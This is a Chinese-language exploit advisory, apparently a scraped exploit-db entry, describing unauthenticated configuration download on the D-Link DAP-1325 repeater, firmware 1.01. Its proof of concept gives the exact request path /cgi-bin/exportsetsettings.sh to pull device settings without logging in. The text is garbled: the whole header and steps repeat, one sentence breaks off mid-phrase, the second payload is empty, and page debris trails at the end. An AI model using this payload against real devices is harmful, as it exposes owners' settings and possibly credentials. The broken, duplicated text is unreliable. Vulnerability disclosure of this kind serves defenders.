#利用标题: D-Link DAP-1325-损坏的访问控制
#日期: 27-06-2023
#利用作者: ieeduardogoncalves
#联系: Twitter.com/0x00dia
#供应商: www.dlink.com
#版本:硬件版本: A1
#固件版本: 1.01
#测试在:ALL平台上
1)描述
安全漏洞被称为“对设置的未经验证访问”或“未经身份验证的配置下载”。当设备(例如中继器)允许下载用户设置而无需正确的身份验证时,就会发生这种漏洞。
就我而
测试的中继器IP: http://192.168.0.21/
视频POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/dap-1325.mp4?dl=0
2)概念证明
步骤1:转到
中继器登录页面: http://192.168.0.21/
步骤2:
将有效载荷添加到URL。
PAYLOAD:
http://{ip}/cgi-bin/exportsetsettings.sh
PAYLOAD:
#日期: 27-06-2023
#利用作者: ieeduardogoncalves
#联系: Twitter.com/0x00dia
#供应商: www.dlink.com
#版本:硬件版本: A1
#固件版本: 1.01
#测试在:ALL平台上
1)描述
安全漏洞被称为“对设置的未经验证访问”或“未经身份验证的配置下载”。当设备(例如中继器)允许下载用户设置而无需正确的身份验证时,就会发生这种漏洞。
就我而
测试的中继器IP: http://192.168.0.21/
视频POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/dap-1325.mp4?dl=0
2)概念证明
步骤1:转到
中继器登录页面: http://192.168.0.21/
步骤2:
将有效载荷添加到URL。
PAYLOAD:
http://{ip}/cgi-bin/exportsetsettings.sh
PAYLOAD:
正在加载...
github.com
